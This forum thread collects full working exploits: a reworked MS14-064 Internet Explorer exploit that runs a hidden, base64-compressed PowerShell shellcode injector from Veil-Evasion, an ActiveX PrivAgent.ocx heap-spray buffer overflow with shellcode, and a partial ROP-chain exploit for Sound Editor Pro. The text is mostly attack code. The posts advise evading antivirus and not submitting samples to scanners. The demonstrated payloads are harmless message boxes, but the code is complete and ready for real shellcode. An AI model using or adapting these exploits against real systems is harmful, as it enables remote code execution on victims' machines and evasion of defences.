FuzzySecurity Personal Conquests

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
Date: 20/11/2014
Name: MS14-064 OLE Automation Array Remote Code Execution

All, currently public, versions of MS14-064 are using VBS as a stager to download a binary payload and execute it. Obviously this is not very practical; PE executables leave traces and antivirus is a concern. There are two options to get around this: (1) insert a full VBS payload or (2) use ShellExecute to call a powershell payload. We will be looking at the latter method.

Public Distribution:
Exploit Database
Metasploit Framework

Veil Framework
Ideally we want something which is as compact as possible and will be loaded straight into memory. The Veil Framework includes a few very good powershell payload delivery mechanisms. We will be able to bootstrap one of these (powershell/shellcode_inject/virtual) straight into the POC provided by yuange.

Bash:
# This payload uses a technique originally pioneered by Matt Graeber in PowerSploit

=========================================================================
Veil-Evasion | [Version]: 2.13.4
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

Payload: powershell/shellcode_inject/virtual loaded

Available commands:

        set             set a specific option value
        info            show information about the payload
        generate        generate payload
        back            go to the main menu
        exit            exit Veil

[>] Please enter a command: generate

[?] Use msfvenom or supply custom shellcode?

     1 - msfvenom (default)
     2 - custom shellcode string
     3 - file with shellcode (raw)

[>] Please enter the number of your choice: 1

[*] Press [enter] for windows/meterpreter/reverse_tcp
[*] Press [tab] to list available payloads

[>] Please enter metasploit payload: windows/messagebox
[>] Enter value for 'TITLE': 'Ooops!'
[>] Enter value for 'TEXT': 'Powershell FTW!'
[>] Enter value for 'ICON': NONE
[>] Enter extra msfvenom options in OPTION=value syntax:

[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: psMSG

Language:              powershell
Payload:               powershell/shellcode_inject/virtual
Shellcode:             windows/messagebox
Options:               TITLE='Ooops!'  TEXT='Powershell FTW!'  ICON=NONE
Payload File:          /root/veil-output/source/psMSG.bat
Handler File:          /root/veil-output/handlers/psMSG_handler.rc


[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner! ;)



The resulting batch script can be seen below.

Bash:
@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression
$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream
(,$([Convert]::FromBase64String(\"nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOu
VLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRP
z9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67z
iyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZ
ylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfO
kGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYw
yZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0
QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+
kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhy
SlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20
MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw==\")))),
[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else
(%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command
"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object
IO.MemoryStream
(,$([Convert]::FromBase64String(\"nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOu
VLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRP
z9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67z
iyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZ
ylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfO
kGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYw
yZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0
QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+
kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhy
SlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20
MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw==\")))),
[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")



You Hate Quotes And They Hate You Too


I'm sure some people must have tried to get this to work, if you did, you will know this this is an uphill battle with quotation marks. The issue is that VBS will (1) terminate the string if it sees double quotes, (2) it uses single quotes to denote comments (=mind blown) and (3) even if VBS accepts the payload, powershell still needs to be able to interpret it.

First things first, the batch file provides payloads for both 32 and 64 bit machines. We need to strip out the payload for our target architecture, in this case the 32bit payload. Additionally we need to split up the base64 encoded string and the rest of the powershell wrapper.


Bash:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader
($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream
(,$([Convert]::FromBase64String(\"nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOu
VLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRP
z9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67z
iyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZ
ylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfO
kGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYw
yZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0
QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+
kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhy
SlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20
MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw==\")))),
[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

Bash:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader
($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream
(,$([Convert]::FromBase64String(\"nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOu
VLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRP
z9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67z
iyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZ
ylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfO
kGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYw
yZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0
QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+
kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhy
SlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20
MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw==\")))),
[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"


Payload:

Notice that the backslashes, escaping the quotation marks round the base64 encoded string, have been removed.


Bash:
"nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X
3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3
DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ
9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjH
s4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSv
Ypb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1p
TAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/Wt
NmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57
y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa5
3WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHant
t18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="

Powershell Wrapper:

The wrapper itself had to be modified a bit to get around the quotation mark issue.


Bash:
"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object          
IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))),
[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"


Exploit


All that remains is to fit the pieces above into the original POC. Please be aware that the version below will not work when copy/pasted due to SyntaxHighlighter's lack of word wrapping. An intact copy can be downloaded here.


HTML:
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>

<pre>
|--------------------------------------------------------------------------|
| Title: OLE Automation Array Remote Code Execution => Pre IE11            |
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/     |
| Rework: GradiusX & b33f                                                  |
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual   |
| Usage:  http://www.fuzzysecurity.com/exploits/21.html                    |
|--------------------------------------------------------------------------|
   Very nice black-magic yuange, don't think it went unnoticed that you 
     have been popping shells since 2009 :D  人无千日好,花无百日红         
|--------------------------------------------------------------------------|
</pre>

<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")

'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!'  text='Powershell FTW!'
payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A
8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1Vezry
X+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84P
Qf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfk
C0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE
5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5
wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIr
bD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+
ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izV
oqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9r
frTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="

command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object
IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))),
[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

params="-NoP -NonI -W Hidden -Exec Bypass -Command " & command

'Original POC yuange
'set shell=createobject("Shell.Application")
'shell.ShellExecute "notepad.exe"

'With UAC
'shell.ShellExecute "powershell", params, "", "runas", 0

'Without UAC
shell.ShellExecute "powershell", params, "", "", 0

end function
</script>

<SCRIPT LANGUAGE="VBScript">
 
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))  
  else
     exit   function 
             
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                   
     else 
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)    
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2) 
  
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310 
     mydata=aa(a1)
     redim  Preserve aa(a0) 
end function


function setnotsafemode()
    On Error Resume Next
    i=mydata() 
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134) 
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0         
              redim  Preserve aa(a2)            
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0) 

     j=0
              j=readmemo(i+&h120+k)  
         
               Exit for
           end if

    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
  
    redim  Preserve aa(a0)
    redim   ab(a0)    
  
    redim  Preserve aa(a2)
  
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
          
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16            
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then  
                 If(IsObject(aa(a1)) = False ) Then           
                   type1=VarType(aa(a1))
                 end if              
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if
        else
           if(vartype(aa(a1-1))<>0)  Then  
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if              
            end if
        end if
    end if
              
    
    If(type1=&h2f66) Then       
          Over=True    
    End If
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If

    redim  Preserve aa(a0)         
        
end function

function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2) 
  
    ab(0)=0  
    aa(a1)=add+4    
    ab(0)=1.69759663316747E-313      
    ReadMemo=lenb(aa(a1)) 
   
    ab(0)=0   
 
    redim  Preserve aa(a0)
end function

</script>

</body>
</html>

1579880723276.png

Bammmm... ;)
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
Date: 27/10/2012
Name: Aladdin Knowledge System Ltd - PrivAgent.ocx (Heap Spray)

Public Release: Exploit-DB
Public Release: Metasploit Module

HTML:
<!-----------------------------------------------------------------------------
// Exploit: Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF  //
// Author: b33f - http://www.fuzzysecurity.com/                              //
// OS: Tested on XP PRO SP3                                                  //
// Browser: IE 4.01, IE 5.01, IE 6.00, IE 7.00                               //
// POC - shinnai: http://www.exploit-db.com/exploits/22258/                  //
// Software: http://www.exploit-db.com/wp-content/themes/exploit/            //
//           applications/1bbc6e4c0d4da600cad8bb3e1a56417e-activex2002.zip   //
------------------------------------------------------------------------------>
 
<html>
  <head>
    <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>
  </head>
  <body>
  <script>
 
    //Messagebox (js_le)
    var MessageBox = unescape(
    '%ue9be%uac66%udb2b%ud9c2%u2474%u58f4%uc931%u3fb1%uc083%u3104%u1070%u7003%u0b10'+
    '%u7593%u50c0%uf285%u9233%u2907%u2d89%u0459%u5a8a%ua6e8%u2ad8%u4c07%ucea8%u149c'+
    '%u655d%ub8dc%u4fd6%uf619%udaf0%u51aa%uf500%u83b2%u7e62%u6020%u0b47%u54fc%u5f0c'+
    '%udcd7%ub513%u57ac%uc20c%u47e9%u3f2d%ubcee%u3464%u37c5%ua477%ub717%uf849%ueba4'+
    '%u382e%uf320%u77ef%ufac4%u6c28%uc723%u56ca%u4de4%u1dd2%u89ae%uca15%u5929%u4719'+
    '%u073d%u563e%u33aa%ud33a%uac2d%ua7ca%u3009%ue4ac%u40e0%u3e07%ub48d%u7cde%ub8e6'+
    '%u8eaf%u961b%u11c7%ue81c%ua4e7%u13a6%uc8a3%ufef0%ub3a0%udb1d%u5314%udc93%u5c66'+
    '%u6725%uca91%u045a%u4b81%ue7cb%u65f3%u606f%u0a81%u020a%ub0e1%ue8f0%uae78%u13af'+
    '%u2a2f%u2ed9%u8980%u0c71%u516c%u4d06%ufb4b%u0fe1%u046c%ua70e%udaca%u18d1%u7883'+
    '%u6a21%u4d35%u049e%u89e5%u9c24%ub9f5%uc605%u19d9%ua62e%u174e%u77ea%u2fb8%u53be'+
    '%ua63f%uadde%ueaed%u9f73%uf543%u2ea4%u59a4%u04ba%u412c');
     
    //Spray spray spray
    var NopSlide = unescape('%u9090%u9090');
    var headersize = 20;
    var slack = headersize + MessageBox.length;
    while (NopSlide.length < slack) NopSlide += NopSlide;
    var filler = NopSlide.substring(0,slack);
    var chunk = NopSlide.substring(0,NopSlide.length - slack);
    while (chunk.length + slack < 0x40000) chunk = chunk + chunk + filler;
    var memory = new Array();
    for (i = 0; i < 500; i++){ memory[i] = chunk + MessageBox }
 
    //EIP => 0x06060606
    junk='';
    for( counter=0; counter<=268; counter++) junk+=unescape("%41");
    pwnd.ChooseFilePath(junk + "\x06\x06\x06\x06"); 
                                                                                                                          
  </script>
</body>
</html>


1579881426048.png
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
Date: 03/10/2012
Name: NCMedia Sound Editor Pro v7.5.1 SEH&DEP&ASLR

Public Release: Exploit-DB

Python:
#!/usr/bin/python

#---------------------------------------------------------------------------#
# Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP                          #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows 7 Pro SP1 (probably universal across 32-bit)                  #
# POC - Julien Ahrens XP SP3: http://www.exploit-db.com/exploits/21331/     #
# Software: http://www.soundeditorpro.com/                                  #
# HOWTO: put the *.dat file in [USER]\Roaming\Sound Editor Pro\             #
#        open -> click "File" menu -> calc ;))                              #
#---------------------------------------------------------------------------#
# Curiously enough, the only thing that went through the mind of the        #
# ROP-Chain as it was executed was "Oh no, not again"!                      #
#---------------------------------------------------------------------------#

import sys, socket, struct

file="MRUList201202.dat"

#--------------------------------------------------------------------------------------------------------------#
# Semi-Universal ROP chain based entirely on MSVCR70.dll which comes packaged with "NCMedia Sound Editor"...   #
#--------------------------------------------------------------------------------------------------------------#
rop = struct.pack('<L',0x7c0126bc)  # XCHG EAX,EBP # ADD AL,7C # RETN                                          |
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                           |
rop += struct.pack('<L',0x7C0390FD) # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B                       |
rop += struct.pack('<L',0x7c023a4f) # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN                                 |
#----------------------------------------------------------------------------------------------[MOV VP -> ESI]-#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                           |
rop += struct.pack('<L',0xFFBF90EF) # NEG is -> 0x00406f11 : jmp esp [SoundEditorPro.exe]                      |
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN [MSVCR70.dll]                                             |
rop += struct.pack('<L',0x7c0126b7) # XCHG EAX,EBP # ADD AL,7C # RETN                                          |
#---------------------------------------------------------------------------------------------[JMP ESP -> EBP]-#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                           |
rop += struct.pack('<L',0xFFFFFDFF) # Neg is 201-HEX (513-bytes)                                               |
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN                                                           |
rop += struct.pack('<L',0x7c01561c) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN                               |
#-------------------------------------------------------------------------------------[Executable Size -> EBX]-#
rop += struct.pack('<L',0x7c026484) # POP EDI # RETN                                                           |
rop += struct.pack('<L',0x7c034e02) # ROP-NOP                                                                  |
#---------------------------------------------------------------------------------------------[ROP-NOP -> EDI]-#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                           |
rop += struct.pack('<L',0xFFFFFFC0) # NEG is 0x40                                                              |
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN                                                           |
rop += struct.pack('<L',0x7c026dc4) # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN |
#------------------------------------------------------------------------------------------[newProtect -> EDX]-#
rop += struct.pack('<L',0x7c034e01) # POP ECX # RETN                                                           |
rop += struct.pack('<L',0x7c049001) # lpOldProtect                                                             |
#-------------------------------------------------------------------------------------[RW lpOldProtect -> ECX]-#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                           |
rop += struct.pack('<L',0x90909090) # NOP                                                                      |
#-----------------------------------------------------------------------------------------[NOP padding -> EAX]-#
rop += struct.pack('<L',0x7c0126b6) # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN                                 |
#-------------------------------------------------------------------------------------------[PUSHAD -> pwnd!!]-#

#----------------------------------
# Greets to SkyLined, you do great work with shellcode!!
